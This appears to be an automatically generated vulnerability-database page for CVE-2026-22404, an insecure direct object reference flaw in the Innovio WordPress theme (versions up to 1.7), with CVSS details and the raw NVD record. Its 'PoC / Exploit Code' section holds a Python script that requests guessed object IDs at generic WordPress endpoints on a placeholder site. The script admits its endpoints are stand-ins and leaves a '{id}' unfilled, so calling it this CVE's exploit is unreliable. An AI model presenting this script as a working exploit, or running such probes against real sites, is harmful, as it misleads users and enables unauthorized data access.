Security Vulnerability Report
中文
CVE-2026-22404 CVSS 3.8 LOW

CVE-2026-22404

Published: 2026-01-22 17:16:34
Last Modified: 2026-04-28 19:36:35

Description

Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Innovio innovio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Innovio: from n/a through <= 1.7.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Innovio Theme <= 1.7
Innovio Theme n/a through 1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-22404 PoC - IDOR in Innovio Theme # Target: WordPress site using Innovio theme <= 1.7 target_url = "http://target-site.com" # IDOR exploitation - accessing unauthorized resources by manipulating object IDs def exploit_idor(): headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } # Try to access resources with different object IDs # Replace endpoint with actual vulnerable endpoint vulnerable_endpoints = [ "/wp-admin/admin-ajax.php?action=get_resource&id=1", "/wp-admin/admin-ajax.php?action=get_user_data&user_id=1", "/wp-json/wp/v2/posts/{id}" ] for endpoint in vulnerable_endpoints: url = target_url + endpoint response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Potential IDOR found at: {endpoint}") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Endpoint returned: {response.status_code}") if __name__ == "__main__": print("CVE-2026-22404 PoC - Testing Innovio Theme IDOR") exploit_idor()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22404", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:33.553", "lastModified": "2026-04-28T19:36:34.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Innovio innovio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Innovio: from n/a through <= 1.7."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autorización a través de una clave controlada por el usuario en Mikado-Themes Innovio innovio permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Innovio: desde n/d hasta &lt;= 1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/innovio/vulnerability/wordpress-innovio-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}